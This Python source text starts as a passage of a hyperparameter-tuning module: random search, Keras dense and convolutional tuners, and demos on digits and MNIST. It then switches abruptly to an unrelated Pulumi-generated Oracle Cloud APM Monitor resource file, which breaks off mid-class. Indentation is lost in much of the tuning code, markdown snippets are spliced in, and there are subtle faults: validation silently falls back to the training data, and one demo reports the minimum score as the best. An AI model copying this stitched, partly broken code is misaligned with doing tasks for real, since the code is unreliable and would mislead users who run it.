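`GridSearch.train` walks the full Cartesian product that `ParameterGrid` builds from the `param_space` dict; a self-contained sketch of just that enumeration (the example values are illustrative):

```python
from sklearn.model_selection import ParameterGrid

# Each key maps to a list of candidate values; ParameterGrid yields
# one dict per combination, i.e. the full Cartesian product.
param_space = {
    'max_depth': [3, 8],
    'criterion': ['gini', 'entropy'],
}
configs = list(ParameterGrid(param_space))  # 2 * 2 = 4 configurations
```

This is why grid search cost grows multiplicatively with each added parameter list.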
class RandomSearch:
def __init__(
self,
model_callable,
param_space,
x_train,
y_train,
kfold_n_splits=5,
score_measure=None,
x_test=None,
y_test=None
):
"""
@param model_callable:
@param param_space: for int and categorical, a list of values, for real, use scipy.stats.distributions, an example is scipy.stats.distributions.uniform
@param x_train:
@param y_train:
@param kfold_n_splits: this is used when no x_test, y_test given, cross validate score, but if x_test, y_test are given, not used
@param score_sign:
@param score_measure:
@param x_test:
@param y_test:
"""
self.search_space = param_space
self.model = model_callable
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.kfold_n_splits = kfold_n_splits
self.highest_score = 0
self.lowest_score = 0
if score_measure is not None:
self.score_measure = score_measure
else:
self.score_measure = partial(f1_score, average='macro')
self.history = []
def train(self, n_iter=10, random_state=None, verbose=True):
rng = np.random.RandomState(random_state)
search_space = list(ParameterSampler(self.search_space, n_iter=n_iter, random_state=rng))
for index, params in enumerate(search_space):
if verbose:
print(f'Step {index + 1} starts, {len(search_space) - index - 1} steps remaining')
start_time = time.time()
model = self.model(**params)
if self.x_test is not None and self.y_test is not None:
model.fit(self.x_train, self.y_train)
pred = model.predict(self.x_test)
acc = self.score_measure(y_true=self.y_test, y_pred=pred)
# params, score, step_time
self.history.append((params, acc, time.time() - start_time))
else:
kf = StratifiedKFold(n_splits=self.kfold_n_splits)
accuracies = []
for idx in kf.split(X=self.x_train, y=self.y_train):
train_idx, test_idx = idx[0], idx[1]
xtrain = self.x_train[train_idx]
ytrain = self.y_train[train_idx]
xtest = self.x_train[test_idx]
ytest = self.y_train[test_idx]
model.fit(xtrain, ytrain)
pred = model.predict(xtest)
fold_acc = self.score_measure(y_true=ytest, y_pred=pred)
accuracies.append(fold_acc)
self.history.append((params, np.mean(accuracies), time.time() - start_time))
if index == 0:
self.highest_score = self.history[-1][1]
self.lowest_score = self.history[-1][1]
if self.history[-1][1] > self.highest_score:
self.highest_score = self.history[-1][1]
if self.history[-1][1] < self.lowest_score:
self.lowest_score = self.history[-1][1]
if verbose:
print(
                    f'Step {index + 1} ends, time spent: {round(self.history[-1][-1], 2)}s, step score: {round(self.history[-1][1], 2)}, highest: {round(self.highest_score, 2)}, lowest: {round(self.lowest_score, 2)}'
)
print('**********************')
return sorted(self.history, key=lambda tup: tup[1], reverse=True)
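The `param_space` format that `RandomSearch` accepts is exactly what sklearn's `ParameterSampler` consumes: lists for discrete parameters, scipy distributions for continuous ones. A self-contained sketch of the sampling step (values are illustrative; `uniform(loc, scale)` samples from `[loc, loc + scale]`):

```python
import numpy as np
from scipy.stats import distributions
from sklearn.model_selection import ParameterSampler

# Discrete parameters as lists, continuous ones as scipy distributions.
param_space = {
    'max_depth': list(range(3, 16)),
    'max_features': distributions.uniform(0.01, 0.99),
}
rng = np.random.RandomState(42)
samples = list(ParameterSampler(param_space, n_iter=5, random_state=rng))
```

Each element of `samples` is a plain dict, ready to unpack into the model constructor with `model_callable(**params)`.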
class keras_dense_model_tune:
def __init__(
self,
n_layers_min_max_step=(5, 10, 1),
layer_size_min_max_step=(5, 100, 5),
output_layer_size_act=(None, None),
activations=None,
optimizers=None,
losses=None
):
"""
@param output_layer_size_act: this one need to be separated because the output shape, but if set None, it will find the dim from y_train
@param n_layers_min_max_step:
@param layer_size_min_max_step:
@param activations:
@param optimizers:
@param losses:
"""
self.output_layer_size = output_layer_size_act[0]
self.output_layer_act = output_layer_size_act[1]
self.n_layers_min = n_layers_min_max_step[0]
self.n_layers_max = n_layers_min_max_step[1]
self.n_layers_step = n_layers_min_max_step[2]
self.layer_size_min = layer_size_min_max_step[0]
self.layer_size_max = layer_size_min_max_step[1]
self.layer_size_step = layer_size_min_max_step[2]
self.activations_default = [
'relu', "sigmoid", "softmax", "softplus", "softsign", "tanh", "selu", "elu"
]
self.optimizers_default = [
"sgd", "rmsprop", "adam", "adadelta", "adagrad", "adamax", "nadam", "ftrl"
]
self.losses_default = ["categorical_crossentropy"]
if activations is not None:
self.activations = activations
else:
self.activations = self.activations_default.copy()
if optimizers is not None:
self.optimizers = optimizers
else:
self.optimizers = self.optimizers_default.copy()
if losses is not None:
self.losses = losses
else:
self.losses = self.losses_default.copy()
def build_model(self, hp):
model = keras.models.Sequential()
for i in range(hp.Int('n_layers', min_value=self.n_layers_min, max_value=self.n_layers_max,
step=self.n_layers_step)):
model.add(
Dense(
units=hp.Int(
f'layer_{i}_size',
min_value=self.layer_size_min,
max_value=self.layer_size_max,
step=self.layer_size_step,
),
activation=hp.Choice(f'layer_{i}_act', values=self.activations)
)
)
model.add(Dense(units=self.output_layer_size, activation=self.output_layer_act))
        model.compile(
            optimizer=hp.Choice('optimizer', values=self.optimizers),
            loss=hp.Choice('loss', values=self.losses),
        )
return model
    def random_search_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
"""
@param x_train:
@param y_train:
@param x_test:
@param y_test:
@param epochs:
@param batch_size:
@param n_trials:
@param executions_per_trial:
@param save_dir:
@param project_name:
@param task_type: string 'classification' or 'regression'
@return:
"""
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Randomsearch(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def bayesian_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_BayesianOptimization(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def hyperband_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
max_epochs=15,
        factor=3,
batch_size=32,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Hyperband(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_epochs=max_epochs,
factor=factor,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
class keras_conv2d_model_tune:
def __init__(
self,
n_conv_layers_min_max_step=(5, 10, 1),
conv_layer_size_min_max_step=(32, 256, 32),
kernel_size_min_max_step=(2, 3, 1),
strides_min_max_step=(1, 2, 1),
output_layer_size_act=(None, None),
activations=None,
optimizers=None,
losses=None
):
self.output_layer_size = output_layer_size_act[0]
self.output_layer_act = output_layer_size_act[1]
self.n_conv_layers_min = n_conv_layers_min_max_step[0]
self.n_conv_layers_max = n_conv_layers_min_max_step[1]
self.n_conv_layers_step = n_conv_layers_min_max_step[2]
self.kernel_size_min = kernel_size_min_max_step[0]
self.kernel_size_max = kernel_size_min_max_step[1]
self.kernel_size_step = kernel_size_min_max_step[2]
self.strides_min = strides_min_max_step[0]
self.strides_max = strides_min_max_step[1]
self.strides_step = strides_min_max_step[2]
self.conv_layer_size_min = conv_layer_size_min_max_step[0]
self.conv_layer_size_max = conv_layer_size_min_max_step[1]
self.conv_layer_size_step = conv_layer_size_min_max_step[2]
self.X_train = np.array([])
self.activations_default = [
'relu', "sigmoid", "softmax", "softplus", "softsign", "tanh", "selu", "elu"
]
self.optimizers_default = [
"sgd", "rmsprop", "adam", "adadelta", "adagrad", "adamax", "nadam", "ftrl"
]
self.losses_default = ["categorical_crossentropy"]
if activations is not None:
self.activations = activations
else:
self.activations = self.activations_default.copy()
if optimizers is not None:
self.optimizers = optimizers
else:
self.optimizers = self.optimizers_default.copy()
if losses is not None:
self.losses = losses
else:
self.losses = self.losses_default.copy()
def build_model(self, hp):
model = keras.models.Sequential()
model.add(
Conv2D(
hp.Int(
'input_conv_units',
min_value=self.conv_layer_size_min,
max_value=self.conv_layer_size_max,
step=self.conv_layer_size_step,
default=32
),
kernel_size=hp.Int(
'input_conv_kernel_size',
min_value=self.kernel_size_min,
                    max_value=self.kernel_size_max,
step=self.kernel_size_step,
default=3
),
strides=hp.Int(
'input_conv_strides',
min_value=self.strides_min,
max_value=self.strides_max,
step=self.strides_step,
default=1
),
input_shape=self.X_train.shape[1:],
                activation=hp.Choice('input_conv_act', values=self.activations)
)
)
model.add(MaxPool2D(pool_size=(2, 2)))
for i in range(hp.Int('n_conv_layers', min_value=self.n_conv_layers_min,
max_value=self.n_conv_layers_max, step=self.n_conv_layers_step,
default=2)):
model.add(
Conv2D(
hp.Int(
f'conv_{i}_units',
min_value=self.conv_layer_size_min,
max_value=self.conv_layer_size_max,
step=self.conv_layer_size_step,
),
kernel_size=hp.Int(
f'conv_{i}_kernel_size',
min_value=self.kernel_size_min,
                        max_value=self.kernel_size_max,
step=self.kernel_size_step
),
strides=hp.Int(
f'conv_{i}_strides',
min_value=self.strides_min,
max_value=self.strides_max,
step=self.strides_step
),
activation=hp.Choice(f'conv_{i}_act', values=self.activations)
)
)
model.add(Flatten())
model.add(Dense(units=self.output_layer_size, activation=self.output_layer_act))
        model.compile(
            optimizer=hp.Choice('optimizer', values=self.optimizers),
            loss=hp.Choice('loss', values=self.losses),
        )
return model
    def random_search_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
self.X_train = x_train.copy()
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_Randomsearch(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
def bayesian_tune(
self,
x_train,
y_train,
x_test=None,
y_test=None,
epochs=10,
batch_size=32,
n_trials=10,
executions_per_trial=1,
save_dir=".",
project_name='keras_model_tune',
task_type='classification'
):
self.X_train = x_train.copy()
if self.output_layer_size is None:
self.output_layer_size = y_train.shape[1]
if self.output_layer_act is None:
self.output_layer_act = 'softmax'
tuner = keras_BayesianOptimization(
self.build_model,
objective='val_accuracy' if task_type == 'classification' else 'val_loss',
max_trials=n_trials,
executions_per_trial=executions_per_trial,
directory=save_dir,
project_name=project_name
)
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner
    def hyperband_tune(
        self,
        x_train,
        y_train,
        x_test=None,
        y_test=None,
        epochs=10,
        max_epochs=15,
        factor=3,
        batch_size=32,
        executions_per_trial=1,
        save_dir=".",
        project_name='keras_model_tune',
        task_type='classification'
    ):
        self.X_train = x_train.copy()
        if self.output_layer_size is None:
            self.output_layer_size = y_train.shape[1]
        if self.output_layer_act is None:
            self.output_layer_act = 'softmax'
        # Hyperband takes max_epochs/factor rather than max_trials
        tuner = keras_Hyperband(
            self.build_model,
            objective='val_accuracy' if task_type == 'classification' else 'val_loss',
            max_epochs=max_epochs,
            factor=factor,
            executions_per_trial=executions_per_trial,
            directory=save_dir,
            project_name=project_name
        )
if x_test is None and y_test is None:
x_test = x_train.copy()
y_test = y_train.copy()
tuner.search(
x=x_train,
y=y_train,
epochs=epochs,
batch_size=batch_size,
validation_data=(x_test, y_test)
)
return tuner


def demo_bayesian():
    import matplotlib.pyplot as plt
    from sklearn.datasets import load_digits
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier
    param_space = [(3, 15, 'max_depth'), (100, 600, 'n_estimators'),
                   (['gini', 'entropy'], 'criterion'), (0.01, 1, 'max_features')]
    accuracy_measurement = partial(f1_score, average='macro')
    X, y = load_digits(n_class=10, return_X_y=True)
    tuning = Bayesian(
        model_callable=model,
        param_space=param_space,
        x_train=X,
        y_train=y,
        kfold_n_splits=5,
        score_sign=-1,
        score_measure=accuracy_measurement,
        x_test=None,
        y_test=None
    )
    result, bayesian_callback = tuning.train(n_calls=10, verbose=True)
    print('#################################')
    print('accuracy history:')
    print(bayesian_callback.accuracies)
    print('config history:')
    print(bayesian_callback.configs)
    print(f'Best result happened at trial {bayesian_callback.configs.index(result.x) + 1}')
    print('Best parameters are: ', dict(zip(tuning.param_names, result.x)))
    print('Best score:', min(bayesian_callback.accuracies))
    plt.figure(figsize=(15, 8))
    plt.scatter(range(len(bayesian_callback.accuracies)), bayesian_callback.accuracies)
    plt.title('score changes by trials')
    plt.show()


def demo_grid_search():
    import matplotlib.pyplot as plt
    from sklearn.datasets import load_digits
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier
    param_space = {
        'max_depth': list(range(3, 16, 5)),
        'n_estimators': list(range(100, 601, 200)),
        'criterion': ['gini', 'entropy'],
        'max_features': np.linspace(0.01, 1, 3)
    }
    accuracy_measurement = partial(f1_score, average='macro')
    X, y = load_digits(n_class=10, return_X_y=True)
    tuning = GridSearch(
        model_callable=model,
        param_space=param_space,
        x_train=X,
        y_train=y,
        kfold_n_splits=5,
        score_measure=accuracy_measurement,
        x_test=None,
        y_test=None
    )
    result = tuning.train(verbose=True)
    configs = [config for config, _, _ in tuning.history]
    scores = [score for _, score, _ in tuning.history]
    print('#################################')
    print('accuracy history:')
    print(scores)
    print('config history:')
    print(configs)
    print('Best parameters are: ', result[0][0])
    print('Best score:', result[0][1])
    plt.figure(figsize=(15, 8))
    plt.scatter(range(len(scores)), scores)
    plt.title('scores from all grids')
    plt.show()
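# A minimal, self-contained sketch of the search space that a grid search
# walks: the {name: [values]} dict used by demo_grid_search above is expanded
# into the cross product of every value list. The helper name
# expand_param_space is illustrative only and not part of this module.

```python
from itertools import product


def expand_param_space(param_space):
    """Expand a {name: [values]} dict into the full list of config dicts."""
    names = list(param_space)
    return [dict(zip(names, combo))
            for combo in product(*(param_space[name] for name in names))]


# The same shape of space used by demo_grid_search, shrunk for clarity.
configs = expand_param_space({
    'max_depth': [3, 8, 13],
    'criterion': ['gini', 'entropy'],
})
assert len(configs) == 6  # 3 depths x 2 criteria
assert configs[0] == {'max_depth': 3, 'criterion': 'gini'}
```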


def demo_random_search():
    import matplotlib.pyplot as plt
    from scipy.stats.distributions import uniform
    from sklearn.datasets import load_digits
    from sklearn.ensemble import RandomForestClassifier

    model = RandomForestClassifier
    param_space = {
        'max_depth': list(range(3, 16, 5)),
        'n_estimators': list(range(100, 601, 200)),
        'criterion': ['gini', 'entropy'],
        'max_features': uniform(0.01, 1)
    }
    accuracy_measurement = partial(f1_score, average='macro')
    X, y = load_digits(n_class=10, return_X_y=True)
    tuning = RandomSearch(
        model_callable=model,
        param_space=param_space,
        x_train=X,
        y_train=y,
        kfold_n_splits=5,
        score_measure=accuracy_measurement,
        x_test=None,
        y_test=None
    )
    result = tuning.train(n_iter=10, random_state=0, verbose=True)
    configs = [config for config, _, _ in tuning.history]
    scores = [score for _, score, _ in tuning.history]
    print('#################################')
    print('accuracy history:')
    print(scores)
    print('config history:')
    print(configs)
    print('Best parameters are: ', result[0][0])
    print('Best score:', result[0][1])
    plt.figure(figsize=(15, 8))
    plt.scatter(range(len(scores)), scores)
    plt.title('scores from all random params')
    plt.show()
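# A stdlib-only sketch of how random-search sampling treats a mixed
# param_space like the one in demo_random_search: list entries are drawn with
# a uniform choice, while continuous distributions (scipy's uniform above)
# are stood in for here by a (low, high) tuple and random.uniform. The helper
# name sample_config is illustrative only and not part of this module.

```python
import random


def sample_config(param_space, rng):
    """Draw one random configuration from a mixed discrete/continuous space."""
    config = {}
    for name, space in param_space.items():
        if isinstance(space, list):
            config[name] = rng.choice(space)   # discrete: uniform choice
        else:
            low, high = space                  # continuous: (low, high) range
            config[name] = rng.uniform(low, high)
    return config


rng = random.Random(0)  # seeded for repeatability, like random_state=0 above
cfg = sample_config({'max_depth': [3, 8, 13], 'max_features': (0.01, 1.0)}, rng)
assert cfg['max_depth'] in (3, 8, 13)
assert 0.01 <= cfg['max_features'] <= 1.0
```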


def keras_dense_turning_demo():
    import os
    from tensorflow import keras
    from tensorflow.keras.datasets import mnist

    kdm = keras_dense_model_tune(
        n_layers_min_max_step=(5, 10, 1),
        layer_size_min_max_step=(50, 100, 5),
        output_layer_size_act=(None, 'softmax'),
        activations=['relu'],
        optimizers=['SGD'],
        losses=['categorical_crossentropy']
    )
    (x_train, y_train), (x_test, y_test) = mnist.load_data()
    image_vector_size = 28 * 28
    x_train = x_train.reshape(x_train.shape[0], image_vector_size)
    x_test = x_test.reshape(x_test.shape[0], image_vector_size)
    num_classes = 10
    y_train = keras.utils.to_categorical(y_train, num_classes)
    y_test = keras.utils.to_categorical(y_test, num_classes)
    tuner = kdm.bayesian_tune(
        x_train,
        y_train,
        x_test,
        y_test,
        epochs=10,
        batch_size=32,
        n_trials=10,
        executions_per_trial=1,
        save_dir=os.getcwd(),
        project_name='keras_dense_turning_demo'
    )
    tuner.results_summary()


def keras_conv_turning_demo():
    import os
    from tensorflow import keras
    from tensorflow.keras.datasets import fashion_mnist

    kdm = keras_conv2d_model_tune(
        n_conv_layers_min_max_step=(5, 10, 1),
        conv_layer_size_min_max_step=(32, 256, 32),
        kernel_size_min_max_step=(3, 3, 1),
        strides_min_max_step=(1, 1, 1),
        output_layer_size_act=(None, 'softmax'),
        activations=['relu'],
        optimizers=['SGD'],
        losses=['categorical_crossentropy']
    )
    (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()
    x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
    x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
    num_classes = 10
    y_train = keras.utils.to_categorical(y_train, num_classes)
    y_test = keras.utils.to_categorical(y_test, num_classes)
    tuner = kdm.bayesian_tune(
        x_train,
        y_train,
        x_test,
        y_test,
        epochs=10,
        batch_size=32,
        n_trials=2,
        executions_per_trial=1,
        save_dir=os.getcwd(),
        project_name='keras_conv_turning_demo'
    )
    tuner.results_summary()
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***

import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *

__all__ = ['MonitorArgs', 'Monitor']


@pulumi.input_type
class MonitorArgs:
    def __init__(__self__, *,
                 apm_domain_id: pulumi.Input[str],
                 display_name: pulumi.Input[str],
                 monitor_type: pulumi.Input[str],
                 repeat_interval_in_seconds: pulumi.Input[int],
                 vantage_points: pulumi.Input[Sequence[pulumi.Input[str]]],
                 configuration: Optional[pulumi.Input['MonitorConfigurationArgs']] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 script_id: Optional[pulumi.Input[str]] = None,
                 script_name: Optional[pulumi.Input[str]] = None,
                 script_parameters: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 target: Optional[pulumi.Input[str]] = None,
                 timeout_in_seconds: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a Monitor resource.
        :param pulumi.Input[str] apm_domain_id: (Updatable) The APM domain ID the request is intended for.
        :param pulumi.Input[str] display_name: (Updatable) Unique name that can be edited. The name should not contain any confidential information.
        :param pulumi.Input[str] monitor_type: Type of monitor.
        :param pulumi.Input[int] repeat_interval_in_seconds: (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] vantage_points: (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
        :param pulumi.Input['MonitorConfigurationArgs'] configuration: (Updatable) Details of monitor configuration.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        :param pulumi.Input[str] script_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
        :param pulumi.Input[str] script_name: Name of the script.
        :param pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]] script_parameters: (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
        :param pulumi.Input[str] status: (Updatable) Enables or disables the monitor.
        :param pulumi.Input[str] target: (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
        :param pulumi.Input[int] timeout_in_seconds: (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
        """
        pulumi.set(__self__, "apm_domain_id", apm_domain_id)
        pulumi.set(__self__, "display_name", display_name)
        pulumi.set(__self__, "monitor_type", monitor_type)
        pulumi.set(__self__, "repeat_interval_in_seconds", repeat_interval_in_seconds)
        pulumi.set(__self__, "vantage_points", vantage_points)
        if configuration is not None:
            pulumi.set(__self__, "configuration", configuration)
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if script_id is not None:
            pulumi.set(__self__, "script_id", script_id)
        if script_name is not None:
            pulumi.set(__self__, "script_name", script_name)
        if script_parameters is not None:
            pulumi.set(__self__, "script_parameters", script_parameters)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if target is not None:
            pulumi.set(__self__, "target", target)
        if timeout_in_seconds is not None:
            pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)

    @property
    @pulumi.getter(name="apmDomainId")
    def apm_domain_id(self) -> pulumi.Input[str]:
        """
        (Updatable) The APM domain ID the request is intended for.
        """
        return pulumi.get(self, "apm_domain_id")

    @apm_domain_id.setter
    def apm_domain_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "apm_domain_id", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Input[str]:
        """
        (Updatable) Unique name that can be edited. The name should not contain any confidential information.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="monitorType")
    def monitor_type(self) -> pulumi.Input[str]:
        """
        Type of monitor.
        """
        return pulumi.get(self, "monitor_type")

    @monitor_type.setter
    def monitor_type(self, value: pulumi.Input[str]):
        pulumi.set(self, "monitor_type", value)

    @property
    @pulumi.getter(name="repeatIntervalInSeconds")
    def repeat_interval_in_seconds(self) -> pulumi.Input[int]:
        """
        (Updatable) Interval in seconds after the start time when the job should be repeated. Minimum repeatIntervalInSeconds should be 300 seconds.
        """
        return pulumi.get(self, "repeat_interval_in_seconds")

    @repeat_interval_in_seconds.setter
    def repeat_interval_in_seconds(self, value: pulumi.Input[int]):
        pulumi.set(self, "repeat_interval_in_seconds", value)

    @property
    @pulumi.getter(name="vantagePoints")
    def vantage_points(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        (Updatable) A list of vantage points from which to execute the monitor. Use /publicVantagePoints to fetch public vantage points.
        """
        return pulumi.get(self, "vantage_points")

    @vantage_points.setter
    def vantage_points(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "vantage_points", value)

    @property
    @pulumi.getter
    def configuration(self) -> Optional[pulumi.Input['MonitorConfigurationArgs']]:
        """
        (Updatable) Details of monitor configuration.
        """
        return pulumi.get(self, "configuration")

    @configuration.setter
    def configuration(self, value: Optional[pulumi.Input['MonitorConfigurationArgs']]):
        pulumi.set(self, "configuration", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. Example: `{"foo-namespace.bar-key": "value"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="scriptId")
    def script_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the script. scriptId is mandatory for creation of SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null.
        """
        return pulumi.get(self, "script_id")

    @script_id.setter
    def script_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "script_id", value)

    @property
    @pulumi.getter(name="scriptName")
    def script_name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the script.
        """
        return pulumi.get(self, "script_name")

    @script_name.setter
    def script_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "script_name", value)

    @property
    @pulumi.getter(name="scriptParameters")
    def script_parameters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]:
        """
        (Updatable) List of script parameters in the monitor. This is valid only for SCRIPTED_BROWSER and SCRIPTED_REST monitor types. For other monitor types, it should be set to null. Example: `[{"paramName": "userid", "paramValue":"testuser"}]`
        """
        return pulumi.get(self, "script_parameters")

    @script_parameters.setter
    def script_parameters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MonitorScriptParameterArgs']]]]):
        pulumi.set(self, "script_parameters", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) Enables or disables the monitor.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def target(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) Specify the endpoint on which to run the monitor. For BROWSER and REST monitor types, target is mandatory. If target is specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script (specified by scriptId in monitor) against the specified target endpoint. If target is not specified in the SCRIPTED_BROWSER monitor type, then the monitor will run the selected script as it is.
        """
        return pulumi.get(self, "target")

    @target.setter
    def target(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target", value)

    @property
    @pulumi.getter(name="timeoutInSeconds")
    def timeout_in_seconds(self) -> Optional[pulumi.Input[int]]:
        """
        (Updatable) Timeout in seconds. Timeout cannot be more than 30% of repeatIntervalInSeconds time for monitors. Also, timeoutInSeconds should be a multiple of 60. Monitor will be allowed to run only for timeoutInSeconds time. It would be terminated after that.
        """
        return pulumi.get(self, "timeout_in_seconds")

    @timeout_in_seconds.setter
    def timeout_in_seconds(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "timeout_in_seconds", value)


@pulumi.input_type
class _MonitorState:
    def __init__(__self__, *,
                 apm_domain_id: Optional[pulumi.Input[str]] = None,
                 configuration: Optional[pulumi.Input['MonitorConfigurationArgs']] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
